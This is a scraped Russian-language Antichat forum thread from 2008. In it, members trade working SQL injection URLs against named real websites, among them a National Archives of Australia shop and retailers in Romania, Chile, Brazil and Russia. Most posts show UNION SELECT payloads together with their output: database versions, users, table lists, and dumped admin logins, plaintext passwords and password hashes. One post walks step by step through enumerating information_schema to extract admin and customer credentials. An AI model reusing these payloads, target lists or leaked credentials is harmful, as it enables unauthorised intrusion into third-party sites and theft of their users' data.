Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
31.08.2008, 10:38
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766
Репутация:
61
|
|
Сообщение от N1K70
вот так вот =\
http://www.lolinko.com/index.php?command=claim&word=-1+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(CONCAT(0x78 73716C696E6A626567696E,Version(),0x2F2A2A2F,Databa se(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),0x7 1),0x71)--
Database Version: 5.0.37-log
Database name: words
User name: mylolinko@localhost
вот таблицы
Database [direcc]
Table [LINKER_CAT ( Rows)]
Table [LINKER_COM ( Rows)]
Table [LINKER_LINK ( Rows)]
Table [LINKER_MAIL ( Rows)]
Table [LINKER_TWORD ( Rows)]
Table [LINKER_WAIT ( Rows)]
Database [linkw]
Table [wl_admin ( Rows)]
Table [wl_content ( Rows)]
Table [wl_group ( Rows)]
Table [wl_settings ( Rows)]
Table [wl_transaction ( Rows)]
Table [wl_word ( Rows)]
Database [words]
Table [config_variables ( Rows)]
Table [font_size_list ( Rows)]
Table [site ( Rows)]
Table [site_status ( Rows)]
Table [word_color ( Rows)]
Table [words ( Rows)]
Последний раз редактировалось Byrger; 31.08.2008 в 10:42..
|
|
|
31.08.2008, 11:53
|
|
Участник форума
Регистрация: 17.06.2008
Сообщений: 214
Провел на форуме:
964766
Репутация:
228
|
|
http://www.emobila.com.ro
Код:
http://www.emobila.com.ro/detalii_categorii.php?id=-10+union+select+1,2,3,concat_ws(version(),0x3a,user(),0x3a,database()),5,6,7,8,9,10/*
version() - 4.1.20-log
user() - emobilaro@193.226.140.172
database() - netemobilaro
|
|
|
|
31.08.2008, 12:03
|
|
Участник форума
Регистрация: 22.04.2007
Сообщений: 128
Провел на форуме:
802306
Репутация:
51
|
|
Сообщение от Gorev
http://www.bogdanlobont.ro/ro/news/view?newsId=268+UNION+SELECT+1,2,3,4,5,6,7,8,conca t_ws(0x3a,version(),user(),database()),10/*
Database Version: 5.0.26
Database name: lobont1
User name: lobont@localhost
http://www.bogdanlobont.ro/ro/news/view?newsId=268+UNION+SELECT+1,2,3,4,5,6,7,8,conca t_ws(id,0x3a,user_login,0x3a,user_pass),10+from+wp _users/*
:1admin1:1$P$Bs8ERbDq2W5FOIL14yZrI4rX1AEbuT0'
Последний раз редактировалось remb0; 31.08.2008 в 12:05..
|
|
|
|
31.08.2008, 12:15
|
|
Участник форума
Регистрация: 17.06.2008
Сообщений: 214
Провел на форуме:
964766
Репутация:
228
|
|
http://www.probeg.ru
Код:
http://www.probeg.ru/news.php?action=read&id=-75+union+select+1,2,3,4,version(),6,7,8/*
version() - 4.1.22-standard-log
user() - probegru@localhost
database() - probegru_probeg
Чет одни 4-е версии пошли(...
|
|
|
|
Исследуем интересный сайтег... |
31.08.2008, 13:20
|
|
Участник форума
Регистрация: 17.06.2008
Сообщений: 214
Провел на форуме:
964766
Репутация:
228
|
|
Исследуем интересный сайтег...
Ух ты. Shop National Archives of Australia
Поставим перед собой задачу: достать логин/пасс админа. Действуем:
https://shop.naa.gov.au
Код:
https://shop.naa.gov.au/browse_cat.php?cat=-42+union+select+version(),2,3/*
version() - 5.0.20-Debian_1-log
user() - naa_webuser@www1.ipalm.net.au
database() - naacart
Версия > 5 это хорошо.
Код:
https://shop.naa.gov.au/browse_cat.php?cat=-42+union+select+table_name,2,3+from+information_schema.tables+limit+1,1/*
Находим интересную табличку admin. Изучаем ее:
Код:
https://shop.naa.gov.au/browse_cat.php?cat=-42+union+select+column_name,2,3+from+information_schema.columns+where+table_name=0x61646d696e+limit+0,1/*
Что имеем?
Код:
id, email_address, password, SiteID, Creation, LastUpdate, common_name
Заинтересовали id и password. Смотрим:
Код:
https://shop.naa.gov.au/browse_cat.php?cat=-42+union+select+concat_ws(id,0x3a,password),2,3+from+admin--
мм.. пока сохраним. Пойдем исследовать таблички дальше. Всего там 38 табличек.
Находим еще одну интересную - customer. Изучаем.
В ходе изучения выяснили, что таблица customer почти одинакова по строению с таблицей admin, только еще имеется личная инфа людей в этой БД и другое. Попробуем вытащить id и password из этой таблицы:
Код:
https://shop.naa.gov.au/browse_cat.php?cat=-42+union+select+concat_ws(id,0x3a,password),2,3+from+customer+limit+0,1--
Давайте узнаем ID и password первого админа:
Код:
https://shop.naa.gov.au/browse_cat.php?cat=-42+union+select+concat_ws(id,0x3a,password),2,3+from+admin+limit+0,1--
Получаем:
1 : 517c617e61a97d5d
Есть. ID и пароли мы получили. Что естественно было и нашей первоначальной задачей 
|
|
|
|
31.08.2008, 16:55
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497
Репутация:
303
|
|
http://test.uhyips.com/adsorder?id=-1+union+select+1,2,concat(username,0x3a3a,password ),4,5,6+from+u60233_new.hyip_user+limit+0,1/*
login: Виктор
pass: 1234
Какая-то шняга
|
|
|
|
31.08.2008, 17:36
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497
Репутация:
303
|
|
http://www.revistadelconsumidor.cl/articulos/contenidos.php?ID_Articulo=-1+union+select+1,2,3,4,5,6,7,8,concat(nom_usuario, 0x3a3a,password),10,11,12,13,14,15,16,17+from+tbus uarios/*
login: claudio
pass: tchpc
http://www.revistadelconsumidor.cl/admin/
|
|
|
|
01.09.2008, 00:21
|
|
Новичок
Регистрация: 22.11.2006
Сообщений: 5
Провел на форуме:
43889
Репутация:
13
|
|
Лодочки 
http://www.kayakextrem.ru/olist.php?id_=1+union+select+1,2,user(),4,5,6,7/*
version() 4.0.26
user() kayakext@fox.hc.ru
database() wwwkayakextremru
Золотой шоп
http://dageena.com/subcategory.php?catid=-1+union+select+1,2,3,concat_ws(0x3a,version(),data base(),user()),5,6,7,8,9,10,11/*
4.1.20-max-log  utsour_dageena utsour_dageena@72.41.255.251
поисковик шопов или полушоп хз вобщем 
http://www.lowyeah.com/store.php?store_id=-1+union+select+concat_ws(0x3a,user(),version(),dat abase())
lowyeah@localhost:4.0.26:lowye</title>
Последний раз редактировалось Evil_Grey; 01.09.2008 в 00:30..
|
|
|
|
01.09.2008, 01:35
|
|
Постоянный
Регистрация: 23.09.2007
Сообщений: 416
Провел на форуме:
1781065
Репутация:
869
|
|
Код:
http://www4.virgula.com.br/realitymusical/nota.php?id=1%20UNION%20SELECT%20concat_ws(0x3a,version(),database(),user()),2,3,4,5,6,7,8,9,10/*
5.0.32-Debian_7etch5-log:idolos:idolos@192.168.228.158
Код:
http://www.agenciapulsar.org/nota.php?id=1%20UNION%20SELECT%20concat_ws(0x3a,version(),database(),user()),2,3,4,5,6,7,8,9,10,11,12/*
4.0.18-standard-log:agenciapulsar:agenciapulsar@192.168.0.127
|
|
|
|
01.09.2008, 05:56
|
|
Участник форума
Регистрация: 09.03.2008
Сообщений: 193
Провел на форуме:
2140897
Репутация:
267
|
|
Вот сегодня шоп попался
Cайт: www.rocklandshop.spb.ru
Код:
http://www.rocklandshop.spb.ru/item.php?id=-43477+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11/*
Version:5.0.32-Debian_7etch3-log
User:zorro_rockland@localhost
DataBase:zorro_rockland
Идём дальше,cмотрим что у нас в INFORMATION_SCHEMA.TABLES:
Код:
about
action
adidas_info
anketa
art
base
city
comment
contacts
exclusive_info
features
file_stat
glossary
goods
info
ip2country
links
menu
network
news
nike_info
orders
partners
poisk
presentation
presentation_copy
reebok_info
salomon_info
search
sites
subscribe
user
user_dopcat
vacancy
video
wallpaper
work
Заинтересовала табличка user:
Cмотрим поля через лимит:
Код:
http://www.rocklandshop.spb.ru/item.php?id=-43477+union+select+1,2,3,COLUMN_NAME,5,6,7,8,9,10,11+FROM+INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME=0x75736572+limit+0,1/*
Находим заинтересовавшие нас поля:
И наконец выводим их:
Код:
http://www.rocklandshop.spb.ru/item.php?id=-43477+union+select+1,2,3,concat_ws(0x3a,user,psw,email),5,6,7,8,9,10,11+FROM+user/*
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
